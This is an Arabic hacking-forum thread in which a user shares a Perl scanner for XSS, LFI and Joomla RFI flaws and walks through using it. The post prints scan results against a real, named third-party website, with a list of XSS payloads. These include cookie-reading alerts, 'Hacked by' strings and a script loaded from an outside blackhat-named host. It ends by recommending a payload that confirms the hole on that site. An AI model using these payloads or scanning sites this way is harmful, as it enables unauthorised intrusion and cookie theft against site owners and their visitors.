حالة الموضوع:
مغلق
  1. IraQ-HacKer

    IraQ-HacKer Developer

    الأنتساب:
    ‏20 ديسمبر 2012
    المشاركات:
    104
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    18
    [​IMG]

    السلام عليكم ورحمة الله تعالي وبركاتة

    سكربت بيرل للبحث عن ثغرات

    XSS , LFI , Joomla RFI

    [INFO]http://pastebin.com/B0bVUiSY[/INFO]
    [ شرح مبسط ]

    ناخذ اكواد السكربت ونفتح تكست ونلصق الاكواد فيه ونحفضه ب صيغه pl
    مثال p.pl
    ونحفضه ف اي مكان ، عن نفسي حفضته في القرص C

    [​IMG]

    [ 1 ] هو الثغرات المراد البحث عنهاَ
    [ 2 ] نضع رقم الثغره ك مثال انا اخترت رقم 1 الي هي XSS
    [ 3 ] نضع الموقع المراد فحصه بدون القيمه او ب القيمه لا مانع
    ثم انتر

    [​IMG]

    [ 4 ] وبعد انتهاء الفحص ، نحفظه ب صيغه txt
    ومرات ينحفظ تلقائياََ
    لكن لمن تواجهه مشكله في حفظ عمله البحث
    يعمل ك التالي
    كمثال في الصوره الثانيه : انا حفظته xxs2.txt

    C:/>xss2.txt
    المسار الي حفظنا فيه
    اسم المستند
    الصيغه

    ثم نتجه ل القرص C
    ينجد المستند ب اسم xss2
    او ب اسم All

    نفتح المستند

    كود PHP:
    http://www.stevenholl.com/project-detail.php?id=58<CeNTer>G3n3Rall</CeNTer>   =>   XSS Vulnerability FOUND 


    http://www.stevenholl.com/project-detail.php?id=58='><script>alert(document.cookie)</script>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58&lt;script&gt;alert('Hacked by TheShow youtube.com/theshowinglok');&lt;/script&gt   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58a?<script>alert('Hacked by TheShow youtube.com/theshowinglok')</script>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<SCRIPT>a=/Hacked by TheShow youtube.com/theshowinglok/alert(a.source)</SCRIPT>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58%3Cscript%3Ealert('Hacked by TheShow')%3C/script%3E   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<IMG SRC=javascript:alert(String.fromCharCode(56,56,44,56,51,44,56,51))>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<IMG SRC=javascript:alert('Hacked by TheShow')>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<SCRIPT>a=/G3n3Rall/alert(a.source)</SCRIPT>   =>   XSS Vulnerability FOUND 


    http://www.stevenholl.com/project-detail.php?id=58<SCRIPT SRC=http://g3n3rall-blackhat.persiangig.com/XSS.JS?<B>   =>   NOT FOUND XSS Vulnerability
    بعد ما نفتح المستند بنجد كلمتين في كل سطر

    XSS Vulnerability FOUND
    تم العثور على ثغره امنيه XSS

    NOT FOUND XSS Vulnerability
    لم يتم العثور على ثغرة أمنية XSS


    طيب ناخذ الرابط الي بعده كلمه XSS Vulnerability FOUND

    كود PHP:
    http://www.stevenholl.com/project-detail.php?id=58<CeNTer>G3n3Rall</CeNTer> => XSS Vulnerability FOUND
    انصح ب استبدال
    <CeNTer>G3n3Rall</CeNTer>

    ب
    "<>'<script>alert(0)</script>

    ليصبح الرابط بهذا الشكل

    كود PHP:
    http://www.stevenholl.com/project-detail.php?id=58"<>'<script>alert(0)</script>

    مصاب وظهر لنا رساله التنبيه 1

    وفقنا الله وياكم لما يحب ويرضى


    [​IMG]

    [​IMG]
     
  2. GosTeR DZ

    GosTeR DZ DeveloPer Plus

    الأنتساب:
    ‏5 يناير 2013
    المشاركات:
    111
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الإقامة:
    Algeria
حالة الموضوع:
مغلق

مشاركة هذه الصفحة